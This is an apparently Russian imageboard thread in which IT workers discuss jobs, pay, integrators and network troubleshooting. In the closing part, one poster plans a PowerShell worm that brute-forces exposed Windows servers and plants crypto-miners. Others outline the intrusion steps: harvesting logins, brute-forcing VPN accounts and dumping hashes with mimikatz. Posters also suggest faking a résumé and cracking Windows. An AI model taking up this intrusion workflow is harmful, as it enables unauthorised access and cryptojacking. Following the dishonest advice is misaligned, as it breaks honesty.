--- Компания Cisco предложила принципиально новое решение в этой гонке — самообучающуюся Интуитивную сеть. Чем дольше вы ее используете, тем умнее она становится, непрерывно адаптируясь к потребностям вашего бизнеса и защищаясь от угроз. Благодаря разработкам Cisco вы сможете сократить расходы и время на обслуживание, сосредоточившись на внедрении инноваций. --- Сетевики! Я давно говорил, что вы не нужны! Наконец-то циска выпустила стоящий продукт, который позволит избавится от вас, как от балласта фирмы. Сеть сама себя настроит, без вашего участия. Только коробки по этажам ставь да включай в розетку"!
>>1157152 >и не факт что там будет лучше :< Везде лучше, где нет быдлоофиса. Алсо, ипотека - зло. Вангую, что работодатель о ней знает и поэтому так на тебе ездит.
>>1157154 О чем ты вообще? Для GPT диска и UEFI загрузчика тебе нужно сделать один раздел с загрузчиком в fat-е, помеченный как EFI и один диск с системой. Нужно поставить на один хард несколько систем? Пожалуйста! Делай свой раздел с загрузчиком для каждой из них и всё! При том в GPT можно эти загрузочные разделы располагать где угодно и как угодно. Нужна безопасность? Включай секьюр бут, прописывай ключи в UEFI и в загрузчик. Более того, любой загрузчик имеет доступ к инфе о других загрузчиках и разделах, т.е. ты можешь из одного загрузчика как перейти в любой другой загрузчик, так и напрямую загрузить систему с любого размера. Ну то есть можно иметь и всего один EFI загрузочный раздел, главное, чтобы загрузчик в нем был достаточно "умным", как, например, GRUB.
Да, тот факт, что поставщики компов уже включают секьюр бут и прописывают только ключ от предустановленной винды немного путает, но в целом то они всё как раз правильно делают, просто это не всегда то, чего хочет "продвинутый" пользователь.
>>1157164 У меня сейчас новый сервер PowerEdge T330, на который нужно поставить Hyper-V (на Windows 2016). Мать сейчас в режиме UEFI. Образ 2016 весит почти 6Гб. Я уже и так и сяк и через косяк, но сервер упорно не видит флешку. Либо я где-то затупил в настройках, либо как-то неправильно режу флешку. Зараза, давно уже этим не занимался, раньше как-то проще всё было.
>>1157169 iDRAC надо потому что использовать и делать установку из образа по сети. С флешки там можно загрузится, но, блядь, я не помню уже как - последний раз dell настраивал года 4 назад и оно и тогда было весьма не тривиально.
>>1157319 Не, с сетевого. Я вчера таки дошаманил. Вечером уже поставил резать новую флешку, с утра попробоваk - загружается. Самое смешное, что рабочая флешка получилась самым простым способом: поставить в WinSetupFromUSB 1.8 галку "auto format" (align, copy BPB , FAT32) и указать образ.
>>1157330 зачем тебе эти сети? Сетевикам жить осталось 5-7 лет, дальше они вымрут за ненадобность. Это ж явно атавизм — держать сетевиков в компании. Надо изучать либо менеджмент/бизнес-аналитику, либо в разработку ударяться. Админство это не ИТ.
>>1157419 Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться, а BGP сам настраиваться при том во всем интернете разом...
>>1157420 >Ага, я прямо так себе и представляю, как заявки о падении каналов будут сами заводиться пфф....система мониторинга на что? Канал упал - системаотправляет письмо в поддержку - если канал поднялся, то отправляет письмо о том, что все работает. Проверка по пингу. В чем проблема? BGP надо настроить один раз и более не трогать. Для этого будет 1 инженер на 100 энтерпрайзов
>>1157421 Ты просто дилетант, поэтому такую ерунду и пишешь. В реальности падения канала не всегда можно отследить мониторингом, т.к. "падение" - это слишком общее понятие. У нас, например, провайдерский линк через L2 устройство заведен, а потом через вланы на роутер проброшен, где уже висит адрес внешний. Так вот стала прилетать бпдушка на L2 оборудовании кривая - связи нет, а линки все есть. Пока стп не отключишь, канал не работает. В чем проблема - ХЗ, мы у себя ничего не меняли, раньше всё работало. Провайдер считает, что у них всё замечательно. Два дня разбираемся и бодаемся.
Или проще случай, чтобы ты точно понял о чем я. Упала площадка - связи нет. Заводить заявку? ХУЙ! У них просто электричество отключили на полчаса...
Да, конечно, надо и L2 уровень всесторонне мониторить и с ИБП данные о пропадании электричества тоже отслеживать. Но по факту ИБП то не везде даже есть, а мониторить всё на свете - это нужно штаб отдельных людей держать, чтобы они систему в актуальном состоянии постоянно поддерживали. Как ни крути - люди нужны. Да, не 10 сетевиков, а 1-2 человека, но так их уже давно в большем количестве никто и не держит...
>>1157422 >вязи нет, а линки все ест>>1157422 >бпдушка на L2 оборудовании кривая - связи нет, а линки все есть а хули вы bpdu-шки провайдеровские принимаете! bdpufilter enable надо было ставить! Это раз! А два вот : В любой филиал заводится два канала - резервный и активный. Мониотринг смотрит - если оба лежат, значит письмо не надо отправлять, скорее всего электричество вырубили. А если один из каналов лежит, то отправляй письмо оператору.
>>1157421 >BGP надо настроить один раз А если ты провайдер?!
>>1157425 >если оба лежат, значит письмо не надо отправлять И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был...
>>1157426 Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала...
>>1157427 >Не настроят. Хотя бы потому что кто-то должен будет сказать им КАК им себя настраивать. Ну там тот же lldp включить на цисках на доступе, чтобы ip-телефония от avaya заработала... Интегратор один раз сделает и забудет. >И как ты это хочешь автоматически разруливать? Например, один канал упал сразу, а другой через пару часов, потом что один ИБП на площадке таки был... А почему вы так реализовали отказоусйчивость, что у вас ИБП обечпечивает только один канал?!
>>1157428 >Интегратор ЛОЛ, а с чего ты взял, что в примере выше про бпдушку это настроил не он, а местные админы? Интегратору намного больше плевать на ошибки в конфигурировании, чем локальным сетевикам.
>вы так реализовали отказоусйчивость Мы просто в год покупаем с десяткой другой мелких бизнесов и они становятся нашими филиалами. Покупаем как есть, а приведение к единым стандартам - это процесс на месяцы и годы.
Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже...
>>1157425 Это не наша и не провайдерская бпдушка как сейчас выяснилось. Просто провайдер арендует последнюю милю у какого-то местечкового мелко-провайдера, вот его то оборудование и начало себя вести неадекватно.
>>1157430 >Твои высказывания и вопросы показывают, что ты либо глупый траль, либо абсолютно не знаком с реалиями ведения бизнеса в России. И честно сказать, я даже не знаю что хуже... Хорошо, сетевики! Вот что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование? Пердолите iptables? vlan на портах прописываете?! Тьфу, блять!
>>1157395 Дрочат дрочат. А в интеграторах так вообще обязательно ее иметь. HR пройти поможет еще, а там уже тащишь знаниями. Еще экзамен эта такая интересная штука, как будто на собеседование сходил, спрашивают всякие вещи которые ты не ожидал. Считаю это дело чрезвычайно полезным. >>1157419 Ну я python учу еще. Будем еба SDN рулить же.
>>1157436 >что вы делаете в моменты, когда не открывается новых офисов, не ставится новое оборудование? В интеграторах/провайдерах таких моментов вообще нет - там постоянная и непрерывная движуха. В хорошем энтерпрайзе - занимаешься развитием мониторинга, ходишь на обучение, приводишь всё ранее купленное к единому знаменателю. Если совсем становится тухло, то меняешь работу - вакансий на рыке просто овер дохуя.
Олсо сам планирую сходить на два фастлайновских курса: NPDESI и NPDEV - первый это программирование для сетевиков, второй - это сети для программистов. Там как раз обучают тому что ты нам всем тут пророчишь. Но есть у меня опасения, что эти курсы окажутся слишком таки поверхностными для меня, а узнать не у кого, т.к. по словам препода - они в рашке не популярные очень, хотя в Европе на них народ валит валом...
>>1157434 Двачую. Интеграторы такие ошибки бывает допускают что просто пиздец. И им за это нихуя не бывает, потому как бабки пилятся на самом верху между своих, а простых ишаков никто не трогает.
>>1157453 >Анон, что делать если я накидался базовой инфой, опыта работы нет, а вместо вакансий пикрилейтед? Везде нужен стаж. пиздеть на собеседовании. Нарисовать левый опыт в резюме
>>1157581 >Так это ж можно обосраться, если возьмут, а ты чего-то элементарного не умеешь. Мало ли, упустил. Не парься на этот счет. На той работе, на которую ты претендуешь, всё что угодно можно нагуглить или спросить на форуме.
Год назад впервые пришла идея походить на собеседования и попробовать устроиться в московские системные интеграсты. Охуел от зарплат - это реально пиздец, за 90-110к рвать жопу с постоянными переработками. Причём в одном месте мне прямо сказали: больше тебе никто не даст, сейчас в ойти везде такие зарплаты. Наглый пиздёж, если слышите такое - сразу разворачивайтесь и уходите. Сама техническая часть собеседования тривиальна. Вопросы могут быть и очень простые, и сравнительно сложные. На одном из собеседований у меня одновременно спрашивали и сайзинг Lync Server на 100к юзеров, и для чего нужна маска подсети. Энивей, если вы средне знаете материал, то вы ответите на всё. Реалии работы везде немного разные, но в целом системный интегратор это ональное рабство. Вы работаете с людьми, у которых зачастую уже развилась деперсонализация от постоянных стрессов. Погонщик орёт что надо вчера. Заказчик брызгает слюной и орёт на переговорах что вы все пидарасы ёбаные и вам пиздец. Текучка кадров, как правило, очень серьёзная. Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего. Платить вам за это будут вышеупомянутую сумму. Плюс оплата за переработки. То есть вы обходитесь конторе крайне дёшево. Поработал в итоге полгода в одном из интеграторов. Когда почувствовал отвращение к админству, то уволился и нашёл другую работу. Теперь всё нормально, интерес к профессии снова появился. Что-то ещё хотел написать, забыл.
>>1158208 > Да, вот ещё, требовать от вас будут реально много. Подвачевать капчу не удастся. Вы будете не успевать ничего. На самом деле это сильное заблуждение. Поработал в нескольких крупных компаниях (в интеграторах в том числе), практически никто в полную силу не работает. Абсолютное большинство айтишников работает либо медленно (не хватает ума или не могут оптимизировать свой рабочий процесс), либо сознательно тратят время на хуйню (чай-кофе, синьюс-рбк-хабрахабр). Эти люди как раз будут рассказывать как много работы и они ничего не успевают.
Я сам довольно ленивый, всё откладываю на последний момент, при этом всегда отвечаю за обозначенные мною сроки и делаю задачи вовремя. Меня считают лучшим инженером в отделе и периодически повышают должность и зарплату. Даже интересно, что было бы, если бы я выкладывался сильнее.
Среди интеграторов, жёстко эксплуатирующих работников, всегда отмечают Крок. Не знаю насколько это правда, но мнение очень популярное. Могу порекомендовать только обходить стороной эту компанию. В других виденных мною компаниях всё как я написал в первом абзаце (несмотря на ужасные отзывы).
>>1158278 >Абсолютное большинство айтишников работает либо медленно Ну уж в интеграторах точно не имеет смысла работать быстрее определённой, эээ, скорости работы. Потому что её там всегда дохуя, сделал одно - нагрузили другим.
>>1158476 И что в этом плохого? Будут нагружать разными задачами, более важными и ответственными. Это опыт, и соответственно повышение или больше возможностей при смене работы. Если человек активен, ответственен и не полный мудак в общении, его никто не будет годами держать на одной и той же позиции с одинаковыми задачами.
>>1158488 Ога ога, всё так обычно и происходит. Сделал одну задачку, добрый руководитель говорит: молодец, а вот теперь держи задачу посложнее. Растёшь, умнеешь. Сделаешь ещё пару задач посложнее, тогда повысим тебя и зарплату побольше дадим.
>>1158496 Никто не говорит, что это быстро происходит. У меня такое обычно на второй год работы, когда я успеваю показать себя. А если у вас тухляк (или плохой руководитель), меняйте место.
>>1158208 Поясните, кстати, за интеграстов. Они, получается, сорт оф админско-эникейный аутсорс? Ну то есть, как и обычный отдел IT-инфраструктуры, но только обслуживающий сразу несколько компаний, преимущественно по удалёнке. Есть ли у них какая-нибудь техническая документация по сетям обслуживаемых ими компаний? Вот, к примеру, я устроюсь на должность на должность сетевика в интеграторе. Первый день. Поступает мне звонок из компании "Залуп-Продакшн", жалуются на то, что не могут связаться с их удалённой площадкой в другом городе. Я, как уже сказал, вообще первый день на работе и не ебу что там и как у этого клиента в сети устроена. Может у них там распределённая сеть на тёмном волокне и, внезапно, пошла по пизде динамическая маршрутизация, или, ну, к примеру, ещё какая-то хуйня произошла. Куда мне глядеть, чтобы хотя бы понять, откуда начать расспрашивать клиента?
Находил ли кто вакансии IT-поддержки в каких-нибудь НИИ или ОКБ? Именно поддержки - обычным эникеем/сисадмином/специалистом по линухам/AD/сетевиком, а не хардовым научным сотрудником? Или в такие золочёные места всё равно нужно ВО, даже если ты будешь просто картриджи менять?
>>1158540 Они не только обслуживают, но и проектируют/внедряют новые системы. Соответственно там можно быть проектировщиком/внедренцем/суппортом (это специализация инженера). А еще есть пресейлы, архитекторы, ГИПы, но это уже дальше.
Антоны, почти два года работаю в полуайтишной компании сис. одменом эникееем по факту, наверное. Честно, уже заебало, и развития там уже почти не стало. Научился поднимать/настраивать шиндосерверы, виртуальными атсками, небольшой ремонт пекарней, подключение/настройки торгового оборудования, видеонаблюдение, даже приходилось переделывать сайтик компании, курил мануалы по js/html/css, за пару месяцев курения сделал много прикольных фич... но вот на HH в основном те же условия и та же зарплата 20-25к. Блять у меня уже отчаяние, как можно с обвалом рубля жить на такие деньги... Что можно предпринять, куда вкатываться, что подтянуть?
>>1158857 >Опишите типичные рабочие задачи в Мухосранском не айтишном ООО на 10 человек? чинить стулья делать кунилингус главному бухгалтеру собирать мебель ну ещё может быть пару раз в месяц переустановить винду
Хэлло Воркач! Где лучше искать удаленную работу админу?
Есть хороший бэкграунт энтерпрайзного говна типа сццм, гипер-в, аксапты и эксченджа. Плюс vmware вся линейка. Плюс железяки любые, могу проектировать небольшие ДЦ. Сети на уровне админа в провайдере(есть подтвержденный опыт). Ну и линукс тоже шарю, но не шибко. Хочу хотя бы $1500. Инглиш на уровне чтения любого говна(не выше).
Сейчас работаю руководителем за 150к в ДС, собираюсь свалить в Тай лет на 5.
Посоны, поясните кто-нибудь за философию в computer science. Услышал тут что есть прям отдельная такая дисциплина на западе, по крайней мере курс её проходят там в учебных заведениях. В чём суть?
>>1158967 Хер знает. То, что ты описал - вмваре, сццм и т.д.. Сети на уровне админа провайдера...это конечно все здорово, если бы ты искал работу на полный день в офис. Но как ты хочешь найти подобную работу удаленно? Из админства удаленно это только линуха и девоопсы всякие. Или по знакомству работку кто подкинет.
>>1157432 Ну Оракл по-моему только так и можно осилить, это же блядь, ёбаное тайное знание, которое из поколение в поколение передаётся и всё равно обязательная техподдержка, ибо пошёл ты нахуй, вот почему.
>>1159042 >Алсо, нахуя вы себе конкурентов-то плодите, лол. Реальные конкуренты могут вырасти только отработав пару-тройку лет на реальной работе. Дроча виртуалки никаким админом никогда не стать.
>>1149761 (OP) Иду устраиваться сис админом на завод в своей мухосрани. Знаний хуй да нихуя, хотя уверен что возьмут. Так вот, есть ли какие то тонкости о которых мне стоит знать и какую работу нужно выполнять а какую нет за 10-15 тыщ?
>>1159259 Смотря какие обязанности > есть ли какие то тонкости о которых мне стоит знать Если что то работает, не старайся с горящими глазами сделать это лучше. Иначе сломаешь, и будут на тебя говно изливать. Лучше тру изучить дело/технологию, если не совсем уверен в своих силах, а потом уже понемногу перепиливать, если захочешь. Как правило сложные задачи появляются внезапно, изза поломки. Тут и появляется опыт
>>1159134 Не, даже беглое гугление выдаёт информацию, по которой там несколько разделов и много своих специфичных терминов. Вот и интересуюсь, есть ли тут кто-то в теме.
>>1159279 По мелочи для себя на свой рабочий комп думаю похуй. А вот что ставить юзверям обговори с начальником, может он сам ссыт проверок. Моему начальнику таки похуй, он себе на комп даже попросил крякнуть шинду, что бы не тратить лицуху
Вчера встретил знакомую девочку. Маникюр делает. Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми, без учета материалов. Это в ДС, конечно. Привет, админы, как у вас там дела? На еду-то хватает вам? Кредит выплатили уже за микроволновку?
Чувствую, что ещё пара годков и матери будут пугать своих детей, мол, плохо будешь учиться — станешь админом, будешь картриджи менять и винду переустанавливать. Как сегодня пугают дворником. Дворникам, кстати, в ДС 60 платят. Если пару участков лишних возьмешь, то сотку, думаю, моэжно заработать.
Понимаю, что может быть не совсем тематика треда, но всё же.
Подумываю вкатиться в ремонт телефонов и около того. Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь. Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое. Руки не из жопы, вроде. Живу в ДС, так что вакансий должно быть достаточно.
Собственно, вопросы: 1) Норм-ли платят и сколько вообще там шекелей есть? 2) Насколько реально вкатиться? 3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения. 4) Хуйня или нет?
>>1159425 >Понимаю, что может быть не совсем тематика треда, но всё же. > >Подумываю вкатиться в ремонт телефонов и около того. >Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь. >Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое. >Руки не из жопы, вроде. >Живу в ДС, так что вакансий должно быть достаточно. > >Собственно, вопросы: >1) Норм-ли платят и сколько вообще там шекелей есть? >2) Насколько реально вкатиться? >3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения. >4) Хуйня или нет? Ничег не хуйня, главное делай хорошо. Можно потом подраюатывать на стороне, чинить телефоны знакомым за деньги и т.д. По мне так нормальный вариант.
>>1159401 Что-то мало. Я как-то нашёл телефон потерянный, по фоткам и СМСкам понял что хозяйка ногти стригла и лакировала, при этом ходила по домам, так у неё поступления на счёт шли по 30-50 штук раз 7-9 в месяц.
>>1159544 Обновил уже. Алсо, атака - хуйня. В прошлый когда HeartBleed была - там тоже можно было куски памяти читать. Причём средства были. Ну поставил дампиться с сервера банка память на дня 3. НИХУЯ в итоге не было в этих гигабайтах памяти. Просто НИХУЯ.
>>1150138 >Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка) >Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями
В абсолютно любом нормальном энтерпрайзе. Вообще, SLA и ITIL не просто красивые слова, вот это вот всё реально охуенно работает.
>>1151529 >>1151538 >>1151566 >>1151965 >>1152301 >>1152549 >>1152745 >На каникулах уже покопаюсь. Так вот, только что покопался. Ничего не перебито, только между разъемом ATX и фишкой фена №1 зажали пару толстых проводов от питания бэкплейна. Фишка встала криво, контакт термодатчика как раз не контачит. Так что с диагнозом угадал. Надо будет теперь пачку стяжек заказать завхозу, да переложить все. Пишу просто чтоб закрыть вопрос.
>>1160051 >Практически любой. Самое главное - общая концепция, она масштабируемая. ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.
>>1160105 >ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.
Как-минимум первую-вторую линию поддержки обеспечить можно. Возможно человек на второй линии и не будет заниматься только дизайном, но уж точно он не должен делать простейшую работу и не должен контактировать с пользователя напрямую.
>>1158540 >админско-эникейный аутсорс да, как обычный ойти отдел, только сразу на дохуя инфраструктур. к вопросу откуда брать знания - как правило, когда проект уже передан на поддержку, то есть хоть какая-то документация. >чтобы хотя бы понять, откуда начать расспрашивать клиента заняться хоть какой-то диагностикой. связаться с заказчиком, поебать ему мозги, назадавать кучу вопросов. есть масса способов потянуть время, пока въезжаешь что да как. в целом, это всё-таки ойти организация, и ситуации вида "пришёл на работу нуб, затупил, и у клиента всё пиздец стало раком" возникают достаточно редко. поначалу точно будут помогать.
очень много зависит от умения общаться с людьми и убеждать их. я бы сказал, что это значит много больше, чем фактический уровень владения внедряемыми продуктами и технологиями. люди, которые одновременно умеют хорошо пиздеть и хорошо внедрять-саппортить-траблешутить, наиболее ценятся в таких конторах, у них больше всего зарплата и им меньше всего ебут мозг.
>>1158541 Бывают такие. В/о вряд ли требуется. Приобретёшь бесценный опыт починки экзотического ПО и/или оборудования. То есть проебёшь несколько лет впустую.
>>1158568 >пресейлы, архитекторы, ГИПы По нынешним временам это скорее не позиции, а роли. Т.е. на одном проекте ты гип, на другом орхитектор, на третьем консультант, на четвёртом саппортишь иногда. Так гораздо дешевле, чем держать отдельных "архитекторов" и гипов. Так не везде, но уже много где.
>>1158967 Варианты бывают, но редко. Видел где-то год назад вакансию удалённого одмена со всем, чем ты перечислил, но за 800 бачей.
>>1159289 >Я именно надрачивая виртуалки пошёл работать за 50к Речь идёт о том, что админ, всего лишь подрочивший виртуалки и поустанавливавший на них жмупинус, не составит реальной конкуренции инженеру с многолетним опытом.
>>1159401 >Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми Элементарная ложь, что я могу сказать
>>1160453 Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких.
>>1160478 >Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких. Кстати, барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют.
>>1160478 Пиздишь, как дышишь, жена ходит в салон каждую неделю по 2 раза. Стоит маникюр 1к рублей. Если, вдруг, давно не делала или есть серьезно поломанные ногти - 2-2,5к за сеанс. Да, есть салоны, где берут в 2-3 больше - туда тоже пробовала ходить, но... разницы в результате нет никакой, лол. А фантастические зарплаты маникюрш в декабре - это норма, т.к. перед праздниками они работают 24/7 - спрос колоссальный же.
>>1160597 >барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют. Ну так и парикмахеры тоже. Сложная женская стрижка с окраской омбре может доходить до 30к рублей... и ее еще надо каждые ~2 недели подкрашивать и подравнивать, что тоже стоит по 3-5к рублей. Пришел, отдал 25к разом и сразу записался на 10 дней вперед еще на 5к.
>>25159679 Люто двачую, я в те годы играл в новейший КС сорс, и в буквальном смысле карал всех с калаша с счётом 30-3 или 35-4, а сейчас дай бог убивать не 1 к 1, ещё я тогда дохуя играл в ла2, и мог за ТХ нагнуть целую консту, скидывал паровоз и добивал выживших, сейчас я бы хуёв пососал. С годами реакция притупляется, правильно говорят, что пиздюком время идёт долго, поэтому ты успеваешь замечать и реагировать на малейшие изменения
>>1160606 >Ну так и парикмахеры тоже У меня есть парикмахер - чурка, приехал из аула, но стрижёт как бог, лучше чем он, меня только стригла знакомая стилистка с рашитудей, но у неё пиздец график, что хуй попадёшь. Я этому парнише каждый раз даю на чай 300-500р от настроения, и буду платить почти любые деньги до 2к рублей, что бы стричься у него дальше
Админы, думал об очередном майнер-вирусе на powershell, и тут задумался, а как через powershell удалённо можно понять какой перед тобой узел: linux, windows, cisco, мне бы точнее вытащить из всего только windows, так как powershell Даже если ты попал на какой-то открытый сервак с SAMBA, ты получишь рабочие 445 и 137-139 порты, но это не значит, что перед тобой windows и можно перебирать пароли по циклу
>>1160663 В детстве во дворе вы в хакеров не играли что-ли?! Олсо ttl можно поменять локально, но ни разу не видел, чтобы так делали, всё равно nmap не обманешь - он более сложные сигнатуры использует. Олсо 127, очевидно, тоже будет винда, просто за роутером.
>>1160685 А что за извращение писать на повершел такое? Аргументы против: - по умолчанию мало где установлен - только в 8, 8.1 и 10, т.е. 7-ка мимо, а 90% корпоратива до сих пор на ней сидит. - ps ранних версий не полностью совместим с 5.1, при этом в 8-ке стоит 3.0, в 8.1 - 4.0, в 10 - 5.1, т.е. тебе надо всё писать на 3.0, чтобы наверняка "везде" заработало.
Олсо сам майнинг всё равно ведь будет через payload, а на ps только сам червь? Я, правда, ХЗ на чем там сейчас червей под винду пишут...
>>1160687 Ну поэтому и был план на повершелле, что бы просто циклом перебрать стандартные логины и пароли, и найти хосты на винде От повершелла я хочу - найти туда куда можно сделать подключение, запустить его через VPN или TOR и пусть себе сканирует подсети на всякие admin/admin, или на SMB без пароля, а там уже дальше будем плясать от полученной информации
Вообще, так-то да, можно ещё на баше написать чтобы чекал открытый 22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен
Первоочередной целью ставлю просто облачные серваки, на которые админы любят заливать бекап и забывать о их существовании на многие годы, ломать целые корп сети - безумие
Мне кажется все вирусы пишут на питоне, так как на питоне можно написать всё, что угодно, а на с++ написать сам питон
>>1160702 >22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен У меня обычно ssh на нестандартном порту + fail2ban + отключена авторизация по паролю, только по ключам. Если на сервер хожу только я, то еще port knocking настраиваю. И вроде норм все.
>>1160702 Подобный червь должен иметь управляющий сервер, куда он будет сгружать всё, что нашел интересного, ну или что успел намайнить. Так что итоговая реализация не такая то и простая будет, потому что управляющие сессии находят и режут абсолютно все системы безопасности, основанные на анализе активности сети/приложений (т.е. и локальные касперские, и фаерволы на границе сети).
>вирусы пишут на питоне Вредонос пишется на том, что может быть исполнено на атакуемой системе. Так как 99% атакуемых систем под виндой, где питона по умолчанию нет, то и писать на нем зловред бессмысленно. Всякие py2exe, конечно, есть, но не проще-ли сразу писать на сях/асме с применением winAPI? На пайтоне разве что реализуют эксполиты, но их и на всём подряд пишут, от си и баша, до перла и пхп.
>Первоочередной целью ставлю просто облачные серваки А как ты хочешь заставить эти серваки выполнять свой код? У тебя какой-то эксплоит уже припасен для этого? Просто подобрать логин/пароль к файловому серверу еще недостаточно... особенно в доменной сети, где на несколько тысяч учетных записей только несколько обладают нужными правами и к ним то как правило пароль брутом не подобрать никак...
>>1160767 А в чем смысл fail2ban, если авторизация только по ключу? Олсо нестанадратный порт тут как бы тоже ни к чему - всё равно найдут и всё равно не подключатся никогда. Лучше уж сделать фильтрацию по доверенным подсетям или вообще только через vpn ходить во внутренние сети.
>>1160771 >fail2ban Я думаю цель, в том, чтобы не создавать флуда, если у тебя есть какой-то виндовый сервак смотрящий в интернет попробуй посмотреть сколько туда подключается каждую секунду
>>1160767 Верно у меня также, хотя и нету бана за фейлы, и вообще закрыт любой SSH на внешний интерфейс, только изнутри и ВПН
>>1160769 Тоже верно, мне интересно просто побрутить и покидать майнеры в автозагрузку
Да, про язык ты прав, в любом случае у меня в планах просто повершелл
Я пока хотел просто подкинуть файл и всё, в домены лезть - себе дороже, если найдут, то посадят на бутылку
Парни ещё раз, атака только на внешние вин сервера где можно набрутить пароль, успокойтесь, хацкеры
Кстати, если память не изменяет, то в домене обычно забирают хэши паролей, и по радужным картам ищут соответствие. Хотя опять же в какой сегмент попадёшь, ну а может дальше линёвого сервера и не уедешь
>>1160702 >root логон совсем у аутистов будет включен Ага, он уже давно по умолчанию в конфиге sshd выключен. >ломать целые корп сети - безумие Внезапно, нет! Ты ведь заранее никогда не знаешь что за каждым конкретным IP-шником... и шанс, что там дырявый корпоративный сервак торчит наружу всегда есть. Собственно, именно так и ломают корпоративные сети: берешь интересные тебе AS-ки и долбишь их во все щели... Если это таргетированная атака, то, конечно, долбишь как можно нежнее, но суть всё равно та же - найти косяки в конфигурации сервисов или непропатченные сервисы. А вот через web корпорат и правда почти не сломать - публичные сайты хостятся отдельно от внутренней инфры. Во-первых, чтобы дос сайта не влиял на доступность инфры, во-вторых, чтобы сложнее было найти точки входа в саму инфру (не у всех же своя AS), ну и еще потому что веб куда более дырявый - потерять корпоративный сайт на пару дней не так страшно, как пустить взломщиков внутрь основной инфры.
>>1160775 Впн через SSL как раз всегда можно сделать и работать будет везде, т.к. закрыть SSL сегодня == закрыть весь инет. Фильтрация по адресам хорошо работает, если ты получаешь доступ к ресурсу из счетного числа мест, например, с работы и из дома. Если надо зайти из другого места - всегда можно пройти через дом/работу.
>>1160777 >>1160778 Есть такие погромисты на похапэ, которым сложно настроить VPN-клиент. Если настраиваешь VPSку таким кадрам, то делать что-то лишнее себе дороже.
>>1160778 >Ага, он уже давно по умолчанию в конфиге sshd выключен. можно вместо рута брать admin admin1 administrator adm и прочие вариации
>публичные сайты хостятся отдельно от внутренней инфры Это опять же всё от аутиста админа зависит, ДМЗ не всегда делается, а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть, при том не всегда для сервера, а иногда для какого-то видео регистратора или подобного китайского скама. Да, тут надо найти точку входа
>>1160778 >Впн через SS ну опенвпн юзает, какой там 1194 порт, по дефолту, вроде, я писал выше про 443, но казахстан уже пытался
>>1160780 Братишка, я тоже тупой, но опенвпн реально совсем просто: 10 команд и скопировать строки в конфиг, поменяв ИП адрес, даже на винде можешь сделать сервер
Это за сегодня. Не очень то и много. Большая часть ломится с логином root, лол.
>в домене обычно забирают хэши паролей Сперва добывают именя пользователей. Это изи, т.к. логины почти всегда совпадают с почтой, которая весьма активно светится в инете на том же корпоративном сайте. Также можно быть уверенным, что у большинства топчиков и всяких важных шишек есть доступ к корпоративному vpn, который тоже реально найти. Дальше брутят пароли - у многих пользователей они весьма брутабельные. Дальше проникают в сеть, потом на машину пользователя. А там уже ловят админские хеши (а то и сами пароли, если винда старая) через mimikatz, потом брутят их. Это как один из векторов, связанный чисто с брутом логинов/паролей.
>проброс портов во внутреннюю сеть для регистратора Ну такой дичи в энтрепрайзе обычно не встретить. Разве что службы безопасности нет совсем (только тогда какой же это, блядь, энтерпрайз?) или админ отмороженный настолько, что у них под носом сделал подобное, не отдавая себе отчета, что это почти что уже статья - умышленное создание бекдора, корпоративный шпионаж и т.д. и т.п. - безопасники 100% найдут у такого админа яйцо на которое можно наступить...
>>1160792 >Ну такой дичи в энтрепрайзе обычно не встретить Зря ты так думаешь, в любой деревенской конторе до 100 человек с бюджетом на ИТ в виде двух эникеев, а такое даже в ДС часто встречается в ГОСах или просто всяких непонятных строительных/магазинчиках конторах Я знал проектный институт, где директор сказал, что он ХОЧЕТ чтобы он смотрел камеры своего кабинета из телефона, и глупый дед-эникей просто сделал маппинг
>HINT: dig .corp.ru MX А если это мелкая контора с почтой на яндексе: mx.yandex.net. 35 IN A 77.88.21.89 Ну так-то да, мейл-ексчейнджер у крупной конторы будет светиться
И вот этот прекрасный момент, я стал суппортом вендора, вместо суппорта заказчика. Теперь меня трахаю в жёппу по миллион раз на день, обзывают пидорасом, причём в открытую и усмехаются в ебало. Ведь я теперь мусор, не человек.
>>1160782 >а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть А как быть если нужен клиентский vpn, для доступа к внутренней сети? И он поднят средствами серверными, тем же openvpn. Без проброса порта или выделения внешнего адреса машине с адресом внутренним не сделать такого.
